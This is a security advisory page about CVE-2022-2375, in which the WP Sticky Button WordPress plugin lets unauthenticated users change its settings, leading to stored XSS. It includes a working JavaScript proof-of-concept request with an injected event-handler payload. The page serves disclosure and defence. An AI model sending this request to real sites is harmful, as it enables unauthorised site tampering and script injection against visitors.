WP Sticky Button < 1.4.1 – Unauthenticated Arbitrary Settings Update to Stored XSS | CVE 2022-2375 | Plugin Vulnerabilities

Description

The plugin does not have authorisation and CSRF checks when saving its settings, allowing unauthenticated users to update them. Furthermore, due to the lack of escaping in some of them, it could lead to Stored Cross-Site Scripting issues

Proof of Concept

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },

  "method": "POST",
  "body": "action=okapi_wasb_save_settings&number=\" style=position:fixed;left:0;top:0;right:0;bottom:0;z-index:9999\x0conmouseover=alert`1`\x0cppp&display_on_desktop=1&activate=1",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

wa-sticky-button

Fixed in 1.4.1

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Submitter twitter

Verified

Yes

WPVDB ID

caab1fca-cc6b-45bb-bd0d-f857edd8bb81

Timeline

Publicly Published

2022-08-01 (about 3 years ago)

Added

2022-08-01 (about 3 years ago)

Last Updated

2023-04-28 (about 2 years ago)

Other

Published

Title

Published

2024-07-26

Title

Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder < 5.1.20 - Authenticated (Administrator+) Stored Cross-Site Scripting

Published

2025-01-31

Title

Better Messages – Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss < 2.7.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Published

2022-06-06

Title

Google Authenticator < 1.0.8 - Admin+ Stored Cross-Site Scripting

Published

2023-10-16

Title

WooCommerce PDF Invoice Builder < 1.2.104 - Reflected XSS

Published

2023-12-04

Title

JSON Content Importer < 1.5.4 - Reflected XSS